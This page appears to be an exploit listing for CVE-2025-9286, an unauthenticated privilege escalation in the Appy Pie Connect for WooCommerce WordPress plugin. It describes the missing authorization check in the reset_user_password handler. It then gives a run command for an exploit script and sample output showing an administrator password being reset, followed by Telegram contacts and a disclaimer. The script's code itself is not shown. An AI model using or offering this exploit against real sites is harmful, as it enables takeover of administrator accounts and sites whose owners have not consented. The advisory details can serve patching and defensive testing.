Share
## https://sploitus.com/exploit?id=83DA7D63-0EA3-52BF-9480-839AB8A47AB6
# CVE-2025-9286
Appy Pie Connect for WooCommerce <= 1.1.2 - Missing Authorization to Unauthenticated Privilege Escalation
# โš ๏ธ Appy Pie Connect for WooCommerce <= 1.1.2 - Missing Authorization to Unauthenticated Privilege Escalation via reset_user_password

## ๐Ÿ“ Description

The Appy Pie Connect for WooCommerce plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within the `reset_user_password()` REST handler in all versions up to, and including, 1.1.2.  
This makes it possible for unauthenticated attackers to reset the password of arbitrary users, including administrators, thereby gaining administrative access.

- **CVE:** CVE-2025-9286  
- **CVSS:** 9.8 (Critical)

---

## ๐Ÿ’ป Exploit Script

The following exploit can be used to leverage CVE-2025-9286 against WordPress sites running the vulnerable plugin version.

**Script Name:** `CVE-2025-9286.py`

### โš™๏ธ Usage

```bash
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1
```

### ๐ŸŸข Sample Output (Successful Exploitation)

```
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.
```

---

## ๐Ÿ“ฌ Contact & Community

- ๐Ÿ“จ **Telegram:** [@Kxploit](https://t.me/Kxploit)
- ๐Ÿ“ก **Telegram Channel:** [@KNxploited](https://t.me/KNxploited)

---

## โš ๏ธ Disclaimer

This exploit is for **educational and authorized penetration testing** purposes only.  
Unauthorized use against systems without explicit permission is illegal.  
The author is not responsible for any misuse or damage caused by this tool.

---

***By: Khaled Alenazi (Nxploited)***